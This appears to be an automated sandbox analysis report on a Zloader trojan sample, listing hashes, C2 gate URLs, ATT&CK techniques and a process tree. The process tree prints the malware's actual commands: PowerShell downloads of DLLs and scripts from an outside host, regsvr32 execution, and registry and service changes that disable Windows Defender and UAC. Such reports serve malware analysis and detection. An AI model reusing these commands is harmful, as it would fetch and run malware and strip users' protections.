zloader | edaabcb2e82b51c9b8df54dc82afc494bff804b1b187c4657ab583e8ca0bd052

Analysis

max time kernel
55s
max time network
185s
platform
windows7_x64
resource
win7v20210410
submitted
16-08-2021 17:59

Sharing

Copy URL

Twitter E-mail

Reason

Remote task has failed: Machine shutdown

Report Analysis Logs

General

Target

8f87fe90d589a4fa73cff6a242fe222b.exe
Size

165KB
MD5

8f87fe90d589a4fa73cff6a242fe222b
SHA1

381e33872d0f6f1a7233beeb6e9524435c2a9ab6
SHA256

edaabcb2e82b51c9b8df54dc82afc494bff804b1b187c4657ab583e8ca0bd052
SHA512

f0ce6885ac47429df5a1a0779c9a455300d77284ef71ff1e344afe2344513b430705ce50d62fceddb051cb5df8b67e1c4969b377413647f4cbe23fc87351aca0

Score

10^/10

zloader ivan ivan botnet persistence trojan

Malware Config

Extracted

Family

zloader

Botnet

ivan

Campaign

ivan

https://iqowijsdakm.com/gate.php

https://wiewjdmkfjn.com/gate.php

https://dksaoidiakjd.com/gate.php

https://iweuiqjdakjd.com/gate.php

https://yuidskadjna.com/gate.php

https://olksmadnbdj.com/gate.php

https://odsakmdfnbs.com/gate.php

https://odsakjmdnhsaj.com/gate.php

https://odjdnhsaj.com/gate.php

https://odoishsaj.com/gate.php

rc4.plain

rsa_pubkey.plain

Signatures

Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
trojan botnet zloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 1784 powershell.exe
Downloads MZ/PE file
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

1360 regsvr32.exe

flow	pid	process
7	1784	powershell.exe

pid	process
1360	regsvr32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

8f87fe90d589a4fa73cff6a242fe222b.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	8f87fe90d589a4fa73cff6a242fe222b.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	8f87fe90d589a4fa73cff6a242fe222b.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

1756 timeout.exe
432 timeout.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

regsvr32.exe

pid process

1756 regsvr32.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1784 powershell.exe
1784 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1784 powershell.exe

pid	process
1756	timeout.exe
432	timeout.exe

pid	process
1756	regsvr32.exe

pid	process
1784	powershell.exe
1784	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1784	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

8f87fe90d589a4fa73cff6a242fe222b.execmd.exeregsvr32.exe

description	pid	process	target process
PID 1856 wrote to memory of 1792	1856	8f87fe90d589a4fa73cff6a242fe222b.exe	cmd.exe
PID 1856 wrote to memory of 1792	1856	8f87fe90d589a4fa73cff6a242fe222b.exe	cmd.exe
PID 1856 wrote to memory of 1792	1856	8f87fe90d589a4fa73cff6a242fe222b.exe	cmd.exe
PID 1792 wrote to memory of 1784	1792	cmd.exe	powershell.exe
PID 1792 wrote to memory of 1784	1792	cmd.exe	powershell.exe
PID 1792 wrote to memory of 1784	1792	cmd.exe	powershell.exe
PID 1792 wrote to memory of 1756	1792	cmd.exe	regsvr32.exe
PID 1792 wrote to memory of 1756	1792	cmd.exe	regsvr32.exe
PID 1792 wrote to memory of 1756	1792	cmd.exe	regsvr32.exe
PID 1792 wrote to memory of 1756	1792	cmd.exe	regsvr32.exe
PID 1792 wrote to memory of 1756	1792	cmd.exe	regsvr32.exe
PID 1756 wrote to memory of 1360	1756	regsvr32.exe	regsvr32.exe
PID 1756 wrote to memory of 1360	1756	regsvr32.exe	regsvr32.exe
PID 1756 wrote to memory of 1360	1756	regsvr32.exe	regsvr32.exe
PID 1756 wrote to memory of 1360	1756	regsvr32.exe	regsvr32.exe
PID 1756 wrote to memory of 1360	1756	regsvr32.exe	regsvr32.exe
PID 1756 wrote to memory of 1360	1756	regsvr32.exe	regsvr32.exe
PID 1756 wrote to memory of 1360	1756	regsvr32.exe	regsvr32.exe

C:\Users\Admin\AppData\Local\Temp\8f87fe90d589a4fa73cff6a242fe222b.exe
"C:\Users\Admin\AppData\Local\Temp\8f87fe90d589a4fa73cff6a242fe222b.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1856

C:\Windows\system32\cmd.exe
cmd /c start.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/JavaP.dll -OutFile JavaP.dll
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1784

C:\Windows\system32\regsvr32.exe
regsvr32 JavaP.dll
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\SysWOW64\regsvr32.exe
JavaP.dll
4⤵
- Loads dropped DLL
PID:1360

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
5⤵
PID:1316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat
3⤵
PID:1004

C:\Windows\system32\cmd.exe
cmd /c nsudo.bat
3⤵
PID:1564

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
4⤵
PID:1352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe
4⤵
PID:1708

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
4⤵
PID:2016

C:\Users\Admin\AppData\Roaming\javase.exe
javase -U:T sc config WinDefend start= disabled
4⤵
PID:1504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest https://pornotublovers.com/autorun100.bat -OutFile autorun100.bat
4⤵
PID:1884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
4⤵
PID:1196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
4⤵
PID:1696

C:\Windows\system32\shutdown.exe
shutdown.exe /r /f /t 00
4⤵
PID:1340

C:\Windows\system32\timeout.exe
timeout 16
3⤵
- Delays execution with timeout.exe
PID:1756

C:\Windows\system32\cmd.exe
cmd /c nsudo.bat
3⤵
PID:1636

C:\Windows\system32\timeout.exe
timeout 16
3⤵
- Delays execution with timeout.exe
PID:432

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:1752

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:1532

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
b309c0c76753aaced3d5b8eb63568afe

SHA1
f70f227618b58acab4486f9165a51e4a09127679

SHA256
ebdd19e23fcb2fdbef8fbb9e0e9cf1af2d7d4ba9fed51753f5a1245519510465

SHA512
fa6ecc15a88d1b28cd00269d25e977033cab68c0259d15544109b0af81f2ab67d1765053a292906048696405fada08a8dad01cfbb8ceead86acef6dc0d7510fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\start.bat
MD5
676d31dd4a8405ead757e0b72d6bd381

SHA1
789a5fc1af78a0630ae705f6dd5506dd476d9d0f

SHA256
57d69a6ca957beb5c9eed7f39d0bb56e6d3348bd510fbba10ad0c19438a712b7

SHA512
79cc7bd42feb80d9a552f2fd6145795ab1904ca7c8d4175f70f9225b04eddcc7107ebf4391eac9d578ed7b963ce192df58050e73b8eaed30e3ef89405e18028c

Download Submit
C:\Users\Admin\AppData\Roaming\JavaP.dll
MD5
23cb9715b98c53a8351d0cfb3d0a24eb

SHA1
4048470f92c65898b3e7186cc98108b74e4b2171

SHA256
bf74dac2db3967e1d661db1bfdbee8fe546bd19ecdcef0baf6b61fb3f78a89d7

SHA512
4b3753020e795b8ba96d292097633a837579aa3b5fa68f7b39f8d76ce3bf3cec6a43663526f9ae79283b4a9aa9034ab96605a554b035ff35f6e10a42bf3efdc1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
c9a3530b442299ad12821d3213974ba1

SHA1
32a63e7134a3d7c8c31d82f7729b715deb7b161d

SHA256
cc1a0e59fd391d34d83fe8ece5e5726326919fcb8121cf53a6e91e4dd698e83a

SHA512
b419184400e941d7a4e3b477b355c690bb3c6b42760a91600dc38944c80580f97e0bc80ed63d9d6ddd97400f76375e47fec22162c0d3f969ab8b85c5b12e8ec9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
c9a3530b442299ad12821d3213974ba1

SHA1
32a63e7134a3d7c8c31d82f7729b715deb7b161d

SHA256
cc1a0e59fd391d34d83fe8ece5e5726326919fcb8121cf53a6e91e4dd698e83a

SHA512
b419184400e941d7a4e3b477b355c690bb3c6b42760a91600dc38944c80580f97e0bc80ed63d9d6ddd97400f76375e47fec22162c0d3f969ab8b85c5b12e8ec9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
c9a3530b442299ad12821d3213974ba1

SHA1
32a63e7134a3d7c8c31d82f7729b715deb7b161d

SHA256
cc1a0e59fd391d34d83fe8ece5e5726326919fcb8121cf53a6e91e4dd698e83a

SHA512
b419184400e941d7a4e3b477b355c690bb3c6b42760a91600dc38944c80580f97e0bc80ed63d9d6ddd97400f76375e47fec22162c0d3f969ab8b85c5b12e8ec9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
c9a3530b442299ad12821d3213974ba1

SHA1
32a63e7134a3d7c8c31d82f7729b715deb7b161d

SHA256
cc1a0e59fd391d34d83fe8ece5e5726326919fcb8121cf53a6e91e4dd698e83a

SHA512
b419184400e941d7a4e3b477b355c690bb3c6b42760a91600dc38944c80580f97e0bc80ed63d9d6ddd97400f76375e47fec22162c0d3f969ab8b85c5b12e8ec9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
c9a3530b442299ad12821d3213974ba1

SHA1
32a63e7134a3d7c8c31d82f7729b715deb7b161d

SHA256
cc1a0e59fd391d34d83fe8ece5e5726326919fcb8121cf53a6e91e4dd698e83a

SHA512
b419184400e941d7a4e3b477b355c690bb3c6b42760a91600dc38944c80580f97e0bc80ed63d9d6ddd97400f76375e47fec22162c0d3f969ab8b85c5b12e8ec9

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
C:\Users\Admin\AppData\Roaming\nsudo.bat
MD5
6f10d512d4cbb527fd26ae266d0a4aef

SHA1
6e42d51ff2d42c5f999943b329a655e901ea4b32

SHA256
b37efaf69f5484fd2e4ec9c83553b9788e39a10fc4390065c29d59f770f34943

SHA512
4f66e8435b8439ace551ad8a70483926891ff3f55b27688602b2e0c58999054bd430308879374f4e8c990a91c3e9cc9cd78b6d355d4370051528bce536e1028e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Roaming\JavaP.dll
MD5
23cb9715b98c53a8351d0cfb3d0a24eb

SHA1
4048470f92c65898b3e7186cc98108b74e4b2171

SHA256
bf74dac2db3967e1d661db1bfdbee8fe546bd19ecdcef0baf6b61fb3f78a89d7

SHA512
4b3753020e795b8ba96d292097633a837579aa3b5fa68f7b39f8d76ce3bf3cec6a43663526f9ae79283b4a9aa9034ab96605a554b035ff35f6e10a42bf3efdc1

Download Submit
\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
\Users\Admin\AppData\Roaming\javase.exe
MD5
5cae01aea8ed390ce9bec17b6c1237e4

SHA1
3a80a49efaac5d839400e4fb8f803243fb39a513

SHA256
19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

SHA512
c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

Download Submit
memory/432-167-0x0000000000000000-mapping.dmp

Download
memory/1004-85-0x0000000001F40000-0x0000000001F41000-memory.dmp

Filesize
4KB

Download
memory/1004-81-0x0000000000000000-mapping.dmp

Download
memory/1004-93-0x000000001B7D0000-0x000000001B7D1000-memory.dmp

Filesize
4KB

Download
memory/1004-86-0x000000001ADA0000-0x000000001ADA1000-memory.dmp

Filesize
4KB

Download
memory/1004-88-0x000000001AD20000-0x000000001AD22000-memory.dmp

Filesize
8KB

Download
memory/1004-89-0x000000001AD24000-0x000000001AD26000-memory.dmp

Filesize
8KB

Download
memory/1004-90-0x0000000002440000-0x0000000002441000-memory.dmp

Filesize
4KB

Download
memory/1004-91-0x0000000002470000-0x0000000002471000-memory.dmp

Filesize
4KB

Download
memory/1196-133-0x000000001AB00000-0x000000001AB02000-memory.dmp

Filesize
8KB

Download
memory/1196-134-0x000000001AB04000-0x000000001AB06000-memory.dmp

Filesize
8KB

Download
memory/1196-136-0x000000001C380000-0x000000001C381000-memory.dmp

Filesize
4KB

Download
memory/1196-126-0x0000000000000000-mapping.dmp

Download
memory/1316-80-0x0000000000000000-mapping.dmp

Download
memory/1316-87-0x0000000000090000-0x00000000000B6000-memory.dmp

Filesize
152KB

Download
memory/1340-163-0x0000000000000000-mapping.dmp

Download
memory/1352-96-0x0000000000000000-mapping.dmp

Download
memory/1360-79-0x0000000010000000-0x000000001017A000-memory.dmp

Filesize
1.5MB

Download
memory/1360-75-0x0000000000000000-mapping.dmp

Download
memory/1360-76-0x00000000752B1000-0x00000000752B3000-memory.dmp

Filesize
8KB

Download
memory/1360-78-0x0000000000170000-0x00000000001F0000-memory.dmp

Filesize
512KB

Download
memory/1504-113-0x0000000000000000-mapping.dmp

Download
memory/1532-170-0x00000000028A0000-0x00000000028A1000-memory.dmp

Filesize
4KB

Download
memory/1564-94-0x0000000000000000-mapping.dmp

Download
memory/1636-166-0x0000000000000000-mapping.dmp

Download
memory/1696-144-0x000000001AB64000-0x000000001AB66000-memory.dmp

Filesize
8KB

Download
memory/1696-143-0x000000001AB60000-0x000000001AB62000-memory.dmp

Filesize
8KB

Download
memory/1696-162-0x000000001B840000-0x000000001B841000-memory.dmp

Filesize
4KB

Download
memory/1696-137-0x0000000000000000-mapping.dmp

Download
memory/1696-161-0x000000001B830000-0x000000001B831000-memory.dmp

Filesize
4KB

Download
memory/1696-146-0x000000001AAF0000-0x000000001AAF1000-memory.dmp

Filesize
4KB

Download
memory/1696-149-0x000000001AB20000-0x000000001AB21000-memory.dmp

Filesize
4KB

Download
memory/1708-101-0x0000000001E90000-0x0000000001E91000-memory.dmp

Filesize
4KB

Download
memory/1708-107-0x000000001B6F0000-0x000000001B6F1000-memory.dmp

Filesize
4KB

Download
memory/1708-106-0x00000000024F4000-0x00000000024F6000-memory.dmp

Filesize
8KB

Download
memory/1708-105-0x00000000024F0000-0x00000000024F2000-memory.dmp

Filesize
8KB

Download
memory/1708-104-0x0000000002050000-0x0000000002051000-memory.dmp

Filesize
4KB

Download
memory/1708-103-0x0000000002440000-0x0000000002441000-memory.dmp

Filesize
4KB

Download
memory/1708-102-0x000000001AA70000-0x000000001AA71000-memory.dmp

Filesize
4KB

Download
memory/1708-97-0x0000000000000000-mapping.dmp

Download
memory/1752-168-0x00000000027C0000-0x00000000027C1000-memory.dmp

Filesize
4KB

Download
memory/1756-165-0x0000000000000000-mapping.dmp

Download
memory/1756-72-0x0000000000000000-mapping.dmp

Download
memory/1784-71-0x000000001AB20000-0x000000001AB21000-memory.dmp

Filesize
4KB

Download
memory/1784-70-0x00000000022F0000-0x00000000022F1000-memory.dmp

Filesize
4KB

Download
memory/1784-65-0x0000000002390000-0x0000000002391000-memory.dmp

Filesize
4KB

Download
memory/1784-66-0x000000001AC70000-0x000000001AC71000-memory.dmp

Filesize
4KB

Download
memory/1784-67-0x00000000026C0000-0x00000000026C1000-memory.dmp

Filesize
4KB

Download
memory/1784-68-0x000000001ABF0000-0x000000001ABF2000-memory.dmp

Filesize
8KB

Download
memory/1784-69-0x000000001ABF4000-0x000000001ABF6000-memory.dmp

Filesize
8KB

Download
memory/1784-63-0x0000000000000000-mapping.dmp

Download
memory/1792-61-0x0000000000000000-mapping.dmp

Download
memory/1856-60-0x000007FEFB591000-0x000007FEFB593000-memory.dmp

Filesize
8KB

Download
memory/1884-123-0x000000001ABF4000-0x000000001ABF6000-memory.dmp

Filesize
8KB

Download
memory/1884-120-0x000000001ABF0000-0x000000001ABF2000-memory.dmp

Filesize
8KB

Download
memory/1884-116-0x0000000000000000-mapping.dmp

Download
memory/2016-109-0x0000000000000000-mapping.dmp

Download